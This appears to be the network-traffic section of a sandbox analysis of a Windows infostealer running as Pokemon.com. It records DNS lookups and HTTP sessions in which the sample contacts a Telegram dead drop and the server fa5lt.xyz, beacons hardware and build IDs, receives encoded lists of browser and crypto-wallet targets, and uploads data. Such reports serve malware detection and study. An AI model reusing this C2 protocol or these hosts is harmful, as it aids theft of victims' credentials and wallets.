Dec 27, 2024 14:46:57.960066080 CET | 1.1.1.1 | 192.168.2.5 | 0xdee9 | No error (0) | www.google.com | | | 65 | IN (0x0001) | false
Dec 27, 2024 14:47:14.086261034 CET | 1.1.1.1 | 192.168.2.5 | 0x8196 | No error (0) | ntp.msn.com | www-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 27, 2024 14:47:14.087500095 CET | 1.1.1.1 | 192.168.2.5 | 0x6d1e | No error (0) | ntp.msn.com | www-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 27, 2024 14:47:15.107899904 CET | 1.1.1.1 | 192.168.2.5 | 0x8e4 | No error (0) | bingadsedgeextension-prod-europe.azurewebsites.net | ssl.bingadsedgeextension-prod-europe.azurewebsites.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 27, 2024 14:47:15.107899904 CET | 1.1.1.1 | 192.168.2.5 | 0x8e4 | No error (0) | ssl.bingadsedgeextension-prod-europe.azurewebsites.net | | 94.245.104.56 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 14:47:15.276489973 CET | 1.1.1.1 | 192.168.2.5 | 0x6ea | No error (0) | bingadsedgeextension-prod-europe.azurewebsites.net | ssl.bingadsedgeextension-prod-europe.azurewebsites.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 27, 2024 14:47:16.967116117 CET | 1.1.1.1 | 192.168.2.5 | 0x4144 | No error (0) | bzib.nelreports.net | bzib.nelreports.net.akamaized.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 27, 2024 14:47:17.058937073 CET | 1.1.1.1 | 192.168.2.5 | 0xa23b | No error (0) | bzib.nelreports.net | bzib.nelreports.net.akamaized.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 27, 2024 14:47:17.713632107 CET | 1.1.1.1 | 192.168.2.5 | 0xe420 | No error (0) | clients2.googleusercontent.com | googlehosted.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 27, 2024 14:47:17.713632107 CET | 1.1.1.1 | 192.168.2.5 | 0xe420 | No error (0) | googlehosted.l.googleusercontent.com | | 142.250.181.65 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 14:47:17.714078903 CET | 1.1.1.1 | 192.168.2.5 | 0x3a2 | No error (0) | clients2.googleusercontent.com | googlehosted.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 27, 2024 14:47:18.922343016 CET | 1.1.1.1 | 192.168.2.5 | 0xea21 | No error (0) | chrome.cloudflare-dns.com | | | 65 | IN (0x0001) | false
Dec 27, 2024 14:47:18.922729015 CET | 1.1.1.1 | 192.168.2.5 | 0x9d5e | No error (0) | chrome.cloudflare-dns.com | | 172.64.41.3 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 14:47:18.922729015 CET | 1.1.1.1 | 192.168.2.5 | 0x9d5e | No error (0) | chrome.cloudflare-dns.com | | 162.159.61.3 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 14:47:18.922841072 CET | 1.1.1.1 | 192.168.2.5 | 0xf6d5 | No error (0) | chrome.cloudflare-dns.com | | 172.64.41.3 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 14:47:18.922841072 CET | 1.1.1.1 | 192.168.2.5 | 0xf6d5 | No error (0) | chrome.cloudflare-dns.com | | 162.159.61.3 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 14:47:18.923219919 CET | 1.1.1.1 | 192.168.2.5 | 0x9bee | No error (0) | chrome.cloudflare-dns.com | | | 65 | IN (0x0001) | false
Dec 27, 2024 14:47:18.929986954 CET | 1.1.1.1 | 192.168.2.5 | 0x7fec | No error (0) | chrome.cloudflare-dns.com | | 172.64.41.3 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 14:47:18.929986954 CET | 1.1.1.1 | 192.168.2.5 | 0x7fec | No error (0) | chrome.cloudflare-dns.com | | 162.159.61.3 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 14:47:18.930006981 CET | 1.1.1.1 | 192.168.2.5 | 0x18e5 | No error (0) | chrome.cloudflare-dns.com | | | 65 | IN (0x0001) | false
Dec 27, 2024 14:47:21.020245075 CET | 1.1.1.1 | 192.168.2.5 | 0x85ff | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 27, 2024 14:47:21.020245075 CET | 1.1.1.1 | 192.168.2.5 | 0x85ff | No error (0) | s-part-0035.t-0009.t-msedge.net | | 13.107.246.63 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 14:47:22.097486973 CET | 1.1.1.1 | 192.168.2.5 | 0x57c1 | No error (0) | assets.msn.com | assets.msn.com.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 27, 2024 14:47:22.097734928 CET | 1.1.1.1 | 192.168.2.5 | 0xa978 | No error (0) | sb.scorecardresearch.com | | 18.161.69.117 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 14:47:22.097734928 CET | 1.1.1.1 | 192.168.2.5 | 0xa978 | No error (0) | sb.scorecardresearch.com | | 18.161.69.8 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 14:47:22.097734928 CET | 1.1.1.1 | 192.168.2.5 | 0xa978 | No error (0) | sb.scorecardresearch.com | | 18.161.69.30 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 14:47:22.097734928 CET | 1.1.1.1 | 192.168.2.5 | 0xa978 | No error (0) | sb.scorecardresearch.com | | 18.161.69.125 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 14:47:22.098839045 CET | 1.1.1.1 | 192.168.2.5 | 0x13d1 | No error (0) | assets.msn.com | assets.msn.com.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
                                                                                                                                                                                                                                                                                    • t.me
                                                                                                                                                                                                                                                                                    • fa5lt.xyz
                                                                                                                                                                                                                                                                                    • www.google.com
                                                                                                                                                                                                                                                                                    • chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                    • clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                    • https:
                                                                                                                                                                                                                                                                                      • assets.msn.com
                                                                                                                                                                                                                                                                                      • c.msn.com
                                                                                                                                                                                                                                                                                      • sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                      • browser.events.data.msn.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49760 | 149.154.167.99 | 443 | 6468 | C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 13:46:41 UTC | 85 | OUT | GET /k04ael HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: t.me
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
2024-12-27 13:46:41 UTC | 512 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:46:41 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                    Content-Length: 12293
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Set-Cookie: stel_ssid=967fa648526f6bbfda_16712613975395752538; expires=Sat, 28 Dec 2024 13:46:41 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                    Cache-control: no-store
                                                                                                                                                                                                                                                                                    X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                                                                                    Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=35768000
2024-12-27 13:46:41 UTC | 12293 | IN | Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @k04ael</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49766 | 116.203.8.178 | 443 | 6468 | C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 13:46:43 UTC | 229 | OUT | GET / HTTP/1.1
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: fa5lt.xyz
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
2024-12-27 13:46:44 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:46:44 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
2024-12-27 13:46:44 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49772 | 116.203.8.178 | 443 | 6468 | C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 13:46:46 UTC | 321 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----ZCTRQ9R1VKF3EU3OZCT0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: fa5lt.xyz
                                                                                                                                                                                                                                                                                    Content-Length: 255
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
2024-12-27 13:46:46 UTC | 255 | OUT
                                                                                                                                                                                                                                                                                    Data Ascii: ------ZCTRQ9R1VKF3EU3OZCT0Content-Disposition: form-data; name="hwid"C492C145C7A6894617998-a33c7340-61ca------ZCTRQ9R1VKF3EU3OZCT0Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------ZCTRQ9R1VKF3EU3OZCT0--
2024-12-27 13:46:47 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:46:46 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
2024-12-27 13:46:47 UTC | 69 | IN | Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 65 31 64 36 65 32 38 36 39 62 30 31 65 35 32 38 38 64 35 65 39 35 31 32 35 62 34 34 39 38 63 34 7c 31 7c 30 7c 31 7c 31 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 3a1|1|1|1|e1d6e2869b01e5288d5e95125b4498c4|1|0|1|1|0|50000|10


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49778 | 116.203.8.178 | 443 | 6468 | C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 13:46:48 UTC | 321 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----00RQI5FKFUSJMYU379R9
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: fa5lt.xyz
                                                                                                                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
2024-12-27 13:46:48 UTC | 331 | OUT
                                                                                                                                                                                                                                                                                    Data Ascii: ------00RQI5FKFUSJMYU379R9Content-Disposition: form-data; name="token"e1d6e2869b01e5288d5e95125b4498c4------00RQI5FKFUSJMYU379R9Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------00RQI5FKFUSJMYU379R9Cont
2024-12-27 13:46:49 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:46:49 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
2024-12-27 13:46:49 UTC | 2192 | IN
                                                                                                                                                                                                                                                                                    Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49784 | 116.203.8.178 | 443 | 6468 | C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 13:46:50 UTC | 321 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----2D2DBIWLXBIE3EUK6PZ5
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: fa5lt.xyz
                                                                                                                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
2024-12-27 13:46:50 UTC | 331 | OUT
                                                                                                                                                                                                                                                                                    Data Ascii: ------2D2DBIWLXBIE3EUK6PZ5Content-Disposition: form-data; name="token"e1d6e2869b01e5288d5e95125b4498c4------2D2DBIWLXBIE3EUK6PZ5Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------2D2DBIWLXBIE3EUK6PZ5Cont
2024-12-27 13:46:51 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:46:51 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
2024-12-27 13:46:51 UTC | 5837 | IN
                                                                                                                                                                                                                                                                                    Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49790 | 116.203.8.178 | 443 | 6468 | C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 13:46:53 UTC | 321 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----5XB1VKX4WTRIMYC2D268
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: fa5lt.xyz
                                                                                                                                                                                                                                                                                    Content-Length: 332
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
2024-12-27 13:46:53 UTC | 332 | OUT
                                                                                                                                                                                                                                                                                    Data Ascii: ------5XB1VKX4WTRIMYC2D268Content-Disposition: form-data; name="token"e1d6e2869b01e5288d5e95125b4498c4------5XB1VKX4WTRIMYC2D268Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------5XB1VKX4WTRIMYC2D268Cont
2024-12-27 13:46:54 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:46:53 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
2024-12-27 13:46:54 UTC | 119 | IN
                                                                                                                                                                                                                                                                                    Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49796 | 116.203.8.178 | 443 | 6468 | C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 13:46:55 UTC | 322 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----LNY58Q9RQIE3E3OP8QIE
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: fa5lt.xyz
                                                                                                                                                                                                                                                                                    Content-Length: 5657
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
2024-12-27 13:46:55 UTC | 5657 | OUT | Data Ascii: ------LNY58Q9RQIE3E3OP8QIEContent-Disposition: form-data; name="token"e1d6e2869b01e5288d5e95125b4498c4------LNY58Q9RQIE3E3OP8QIEContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------LNY58Q9RQIE3E3OP8QIECont
2024-12-27 13:46:56 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:46:56 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
2024-12-27 13:46:56 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49798 | 116.203.8.178 | 443 | 6468 | C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 13:46:56 UTC | 321 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----P8GLX4OZU37YU3WL6P8Q
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: fa5lt.xyz
                                                                                                                                                                                                                                                                                    Content-Length: 489
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
2024-12-27 13:46:56 UTC | 489 | OUT | Data Ascii: ------P8GLX4OZU37YU3WL6P8QContent-Disposition: form-data; name="token"e1d6e2869b01e5288d5e95125b4498c4------P8GLX4OZU37YU3WL6P8QContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------P8GLX4OZU37YU3WL6P8QCont
2024-12-27 13:46:57 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:46:57 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
2024-12-27 13:46:57 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49814 | 142.250.181.68 | 443 | 2504 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 13:46:59 UTC | 615 | OUT | GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
2024-12-27 13:47:00 UTC | 1266 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:00 GMT
                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                    Expires: -1
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                                    Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                    Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-NrCLyHar75l2T8Ab2Eax0g' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                    Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                    Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                    Server: gws
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Data Ascii: NTITY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49815 | 142.250.181.68 | 443 | 2504 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 13:47:00 UTC | 518 | OUT | GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
2024-12-27 13:47:00 UTC | 1018 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Version: 705503573
                                                                                                                                                                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                    Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                    Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:00 GMT
                                                                                                                                                                                                                                                                                    Server: gws
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49816 | 142.250.181.68 | 443 | 2504 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 13:47:00 UTC | 353 | OUT | GET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: www.google.com
